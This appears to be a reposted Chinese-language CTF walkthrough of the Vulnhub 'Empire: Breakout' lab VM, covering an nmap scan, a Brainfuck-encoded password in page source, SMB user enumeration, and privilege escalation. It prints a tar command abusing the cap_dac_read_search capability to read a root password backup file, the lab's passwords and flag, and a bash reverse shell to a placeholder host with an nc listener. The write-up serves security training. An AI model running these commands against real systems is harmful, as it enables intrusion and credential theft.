文章总结： 本文详细介绍了Vulnhub靶场《Breakout》的完整渗透测试过程，从信息收集、Web渗透到权限提升。作者通过Nmap扫描发现多个开放端口，分析80端口网页源代码中的Brainfuck加密信息获取密码，使用enum4linux工具获取用户名cyber，在20000端口成功登录并获取user.txt文件。随后，利用tar工具的root权限读取/var/backups/.old_pass.bak文件中的root密码，最终通过反弹Shell和提权命令完成渗透测试。文章提供了详细的命令和截图，适合渗透测试初学者学习参考。 综合评分： 88 文章分类： 渗透测试,CTF,WEB安全,漏洞分析,实战经验

《Breakout》攻防大揭秘，Vulnhub靶场最强突破攻略！

原创

蜡笔小qian

黑客映像馆

2025年12月16日 17:30 湖北

在渗透测试和CTF（Capture the Flag）挑战中，Vulnhub靶场一直是许多网络安全爱好者的重要练兵场。而《Breakout》靶场，无疑是其中一道难度较高的挑战。本篇文章将带你走一遍从Web渗透到权限提升的完整过程，通过一系列精细的操作步骤，让我们一起攻破这座虚拟堡垒。

靶机下载地址：

https://www.vulnhub.com/entry/empire-breakout,751/下载后直接用Vmvare导入就行。

0x01 扫描与信息收集

第一步，正如渗透测试的基本准则——信息收集。在对目标IP进行Nmap扫描时，我们得到了以下信息：

nmap -sS -T4 -A 10.254.2.14

• 80端口：Apache2默认页面
• 10000端口：Web服务，需要SSL模式
• 20000端口：Web服务，且可登录
• 139/445端口：SMB服务（通常用来进行文件共享）

通过这些端口信息，我们可以推测目标系统可能存在Web服务和SMB共享文件的潜在漏洞，接下来我们逐步展开渗透。

0x02 Web渗透

80端口：Apache2 默认页面

我们首先访问80端口，看到的是一个标准的Apache2默认页面。在查看网页源代码时，我们发现了一个非常引人注目的注释，其中包含了一段加密的内容。经过简单分析后，我们认为这可能是某种密码。

通过在线工具 Brainfuck解码器 进行解码，成功地将加密字符串转换成了明文密码。接下来，我们的目标就是通过这些线索，进一步访问其他服务。

10000端口：登陆页面

访问10000端口时，我们发现该服务需要使用SSL模式，因此需要通过HTTPS协议访问。进入后，出现了一个登录页面。我们尝试使用之前解码得到的密码进行登录，但仍然无法成功登录。这时，我们还不知道目标系统的用户名。

为了寻找用户名，我们决定使用 enum4linux 这一信息收集工具，它是Kali自带的非常强大的SMB信息收集工具。通过 enum4linux -A 参数，我们收集到了目标系统中的一个用户名：cyber。

有了用户名后，我们再次尝试使用上面获得的密码进行登录，但依然未果。接下来，我们决定尝试访问20000端口。

20000端口：成功登录

我们尝试使用相同的用户名和密码登录20000端口，成功进入了该服务。登录后，我们看到了丰富的菜单栏，并通过文件管理器浏览到一个名为 user.txt 的文件。打开文件后，我们发现其中包含一个 flag，这也是我们这次渗透挑战的一个标志性胜利。

3mp!r3{You_Manage_To_Break_To_My_Secure_Access}

0x03 权限提升

拿到 user.txt 文件的flag后，接下来的目标是提升权限，获取root权限。在继续分析系统时，我们发现在 user.txt 上方有一个名为 .tar 的文件，而该文件的所有者是 root，这意味着我们有机会利用该文件执行root权限。

但是，这个文件并没有后缀，具体是什么格式我们并不清楚。在检查系统时，我们发现该系统自带了一个终端窗口，可以直接在左下角打开命令行界面。我们使用 file 命令查看该文件属性，结果显示它是一个Linux可执行文件。

接下来，我们利用系统自带的 getcap 命令查看该文件的权限，发现它具有读取文件的能力。继续检查系统，我们发现 /var/backups/ 目录下有一个名为 .old_pass.bak 的文件。

cap_dac_read_search=ep

使用 tar 提权

由于权限不足，我们无法直接读取 .old_pass.bak 文件。此时，我们想到可以利用 tar 工具来执行 cat 命令，读取该文件内容。

./tar -cf bak.tar /var/backups/.old_pass.bak //利用tar的root权限，可以先打包成tar压缩包放到当前目录了tar -xf bak.tar //然后利用tar工具解压cd /var/backups/cat .old_pass.bak //然后就可以看到一个密码密码是：Ts&4&YurgtRX(=~h

我们成功地利用 tar 命令读取到了备份文件。接下来，我们发现 .old_pass.bak 文件的内容可能包含root密码。通过获取更多的信息，我们进一步分析了目标系统，最终找到了可以通过 tar 执行特定操作的入口。

反弹Shell并提升权限

最后，通过反弹Shell，我们成功突破了目标系统的防线。使用以下命令反弹Shell到公网服务器：

bash -i >& /dev/tcp/x.x.x.x/1234 0>&1nc -lvp 1234 //服务器开启监听SHELL=/bin/bash script -q /dev/null

成功建立连接后，我们进一步升级了Shell交互形式，避免了在使用 su 切换root时出现卡顿问题。通过 SHELL=/bin/bash script -q /dev/null 命令，我们顺利切换到root用户，完成权限提升。

结语

通过这次对Vulnhub靶场《Breakout》的渗透与攻击，我们不仅成功地突破了Web服务的防线，还通过对系统的深入分析与操作，顺利实现了权限提升。这次实战不仅加深了我们对Web漏洞的理解，还进一步掌握了如何利用工具进行信息收集和提权操作。

渗透测试不仅仅是对技术的挑战，更是对思维和细节的挑战。每一次突破都离不开对系统、服务的仔细研究和对漏洞的敏锐捕捉。希望本文的分享能帮助你更好地掌握渗透测试的技能，在未来的挑战中披荆斩棘，打破更多的防线！

查看原文：《《Breakout》攻防大揭秘，Vulnhub靶场最强突破攻略！》